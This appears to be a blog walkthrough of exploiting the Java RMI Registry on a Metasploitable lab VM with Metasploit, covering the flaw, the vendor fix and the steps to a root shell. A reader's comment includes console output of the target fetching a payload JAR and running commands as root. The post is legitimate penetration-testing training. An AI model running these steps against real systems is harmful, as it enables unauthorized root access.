Java RMI Registry

Port: TCP 1099
Service: Java rmiregistry

Vulnerability: The vulnerability is due to the default configuration of the RMI Registry and RMI Activation services allowing the loading of classes from a remote URL. A remote unauthenticated attacker can leverage this vulnerability by sending a crafted RMI message to a target server. (http://telussecuritylabs.com/threats/show/TSL20110718-02)

Mitigation: Upgrade to the latest software versions from the vendor’s website. (http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html)

Proof of Concept
1. From your Kali machine, load up Metasploit, and do a search for “java_rmi”.

javarmi-msf-searchexploit

2. Set Metasploit to use the “java_rmi_server” exploit, and configure the options based on the IP of your Metasploitable VM.

javarmi-msf-setoptions

With Metasploit, some of the exploit modules can be paired with payloads. The payload can be anything from a basic shell, to a Meterpreter session. In order to see the payloads available for a particular exploit, type in the command “show payloads” at the msf prompt. If you’re new to Metasploit, I suggest visiting their website, and reading through the various tutorials they have.

The payload I’m using here is “java/shell/bind_tcp”. I had to try a couple different payloads to get a stable one, so the results may be different with your setup.

3. Once the options are set, type in “exploit”, and you should be presented with a shell.

javarmi-msf-exploit-rootshell

As always, with root level access, you have control of the entire victim machine, and can continue enumerating the box for interesting data.

One thought on “Java RMI Registry
  1. Another great tutorial.

    I have a query/question on this one.

    Once ‘root’ has been gained by the exploit, I am only able to input one command (with output) before the connection is closed. I have to rerun the exploit each time I need to run a command – Is this expected?

    example:

    msf exploit(java_rmi_server) > exploit
    [*] Exploit running as background job.

    [*] Started reverse TCP handler on 192.168.0.16:4444
    msf exploit(java_rmi_server) > [*] 192.168.0.18:1099 – Using URL: http://0.0.0.0:8080/E9TYLTG
    [*] 192.168.0.18:1099 – Local IP: http://192.168.0.16:8080/E9TYLTG
    [*] 192.168.0.18:1099 – Server started.
    [*] 192.168.0.18:1099 – Sending RMI Header…
    [*] 192.168.0.18:1099 – Sending RMI Call…
    [*] 192.168.0.18:1099 – Replied to request for payload JAR
    [*] 192.168.0.18:1099 – Server stopped.
    id
    [*] exec: id

    uid=0(root) gid=0(root) groups=0(root)
    msf exploit(java_rmi_server) >

Leave a Reply

Your email address will not be published. Required fields are marked *